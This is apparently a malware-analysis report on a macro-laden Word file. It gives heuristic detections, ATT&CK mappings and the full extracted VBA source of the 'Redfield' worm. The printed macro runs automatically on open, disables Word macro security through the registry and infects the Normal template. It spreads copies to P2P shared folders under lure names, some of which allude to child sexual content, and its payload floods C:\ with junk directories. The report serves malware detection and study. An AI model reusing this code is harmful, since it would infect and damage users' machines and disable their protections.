MALICIOUS
348
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros that are automatically executed via the AutoOpen function. These macros disable macro security settings and attempt to export a component to C:\redfield.drv. It then uses WScript.Shell to read the ProgramFilesDir and proceeds to create various executable and document files, suggesting a downloader or dropper functionality. The ClamAV detection of Win.Worm.Godog-4 further supports the malicious classification.
Heuristics 8
-
ClamAV: Win.Worm.Godog-4 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Worm.Godog-4
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
'taken from NWWF by Necronomikom/DCA Set shell = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
'taken from NWWF by Necronomikom/DCA Set shell = CreateObject("wscript.shell") Set fso = CreateObject("scripting.filesystemobject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "REDFIELD" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5649 bytes |
SHA-256: 47760b122c5a1b0773c72e1f2f1846f0160aec34ac095acee93cae9053926343 |
|||
|
Detection
ClamAV:
Win.Worm.Godog-4
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "REDFIELD"
Sub AutoOpen()
On Error Resume Next
Call Infection
End Sub
Sub AutoNew()
On Error Resume Next
Call Infection
End Sub
Sub Infection()
Dim shell, fso
On Error Resume Next
'Redfield
'(c) by Zeraphime
z = 0: S = System: NT = NormalTemplate: AD = ActiveDocument: PPS = PrivateProfileString
With Options
.ConfirmConversions = z
.VirusProtection = z
.SaveNormalPrompt = z
End With
S.PPS("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security", "Level") = 1&
S.PPS("", "HKEY_CURRENT_USER\Software\Microsoft\Office\" & Application.Version & "\Word\Security", "AccessVBOM") = 1&
WordBasic.DisableAutoMacros z
Set Norm = NT.VBProject.VBComponents
Set Doc = AD.VBProject.VBComponents
If Norm.Item("redfield").Name <> "redfield" Then
Doc("redfield").Export "C:\redfield.drv"
Set i = NT.VBProject
ElseIf Doc.Item("redfield").Name <> "redfield" Then
Norm("redfield").Export "C:\redfield.drv"
Set i = AD.VBProject
End If
i.VBComponents.Import ("C:\redfield.drv")
ActiveDocument.Save
'taken from NWWF by Necronomikom/DCA
Set shell = CreateObject("wscript.shell")
Set fso = CreateObject("scripting.filesystemobject")
Pgdir = shell.regread("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ProgramFilesDir")
Files = Array("AIM Password Stealer.exe", "Hot Girl.jpg", "Pussy.jpg", "preteensex.avi", "big boobs.jpg", "nuke afghanistan game.exe", "School Reports.doc", "Sex Tips.doc", "Lord of the rings.doc", "nec is back.doc", "Eminem - I need to be shot.mp3", "BitchSuck.avi")
kl = (Pgdir & "\kazaa lite\my shared folder") & "\"
If fso.folderexists(kl) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
kazaa = (Pgdir & "\kazaa\my shared folder") & "\"
If fso.folderexists(kazaa) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
kmd = (Pgdir & "\kmd\my shared folder") & "\"
If fso.folderexists(kmd) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
grokster = (Pgdir & "\grokster\my grokster") & "\"
If fso.folderexists(grokster) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
bearshare = (Pgdir & "\bearshare\shared") & "\"
If fso.folderexists(bearshare) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
edonkey = (Pgdir & "\edonkey2000\incoming") & "\"
If fso.folderexists(edonkey) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
morpheus = (Pgdir & "\morpheus\my shared folder") & "\"
If fso.folderexists(morpheus) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
limewire = (Pgdir & "\limewire\shared") & "\"
If fso.folderexists(limewire) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Tesla = (Pgdir & "\Tesla\Files") & "\"
If fso.folderexists(Tesla) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
XoloX = (Pgdir & "\XoloX\Downloads") & "\"
If fso.folderexists(XoloX) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Shareaza = (Pgdir & "\Shareaza\downloads\") & "\"
If fso.folderexists(Shareaza) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Gnucleus = (Pgdir & "\Gnucleus\downloads") & "\"
If fso.folderexists(Gnucleus) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
WinMX = (Pgdir & "\WinMX\my shared folder") & "\"
If fso.folderexists(WinMX) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Ftopia3 = (Pgdir & "\Ftopia3\Files") & "\"
If fso.folderexists(Ftopia3) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Toadnode = (Pgdir & "\Toadnode\share") & "\"
If fso.folderexists(Toadnode) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
icq = (Pgdir & "\icq\shared files") & "\"
If fso.folderexists(icq) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Overnet = (Pgdir & "\Overnet\Incoming") & "\"
If fso.folderexists(Overnet) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Rapigator = (Pgdir & "\Rapigator\Share") & "\"
If fso.folderexists(Rapigator) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
Apple = (Pgdir & "\AppleJuice\Incoming") & "\"
If fso.folderexists(Apple) Then
For x = 0 To 11
fso.copyfile necfilez, kl & Files(x) & ".doc"
Next
End If
If S.PPS("", "HKLM\Software\Microsoft\Windows NT\CurrentVersion", "RegisteredOwner") <> "zeraphime" Then
Call msg
Else
Call HDkill
End If
End Sub
Sub msg()
MsgBox "Luke i am your daddy...;)", vbInformation, "REDFIELD Info:"
End Sub
Sub HDkill()
Randomize
For XXX = 1 To Int(Rnd * 10000) + 100
AAA = Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65) & Chr(Int(Rnd * 25) + 65)
MkDir "c:\" & AAA
Next XXX
End Sub
Sub helpabout()
MsgBox "(c) by Zeraphime", vbInformation, "REDFIELD"
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.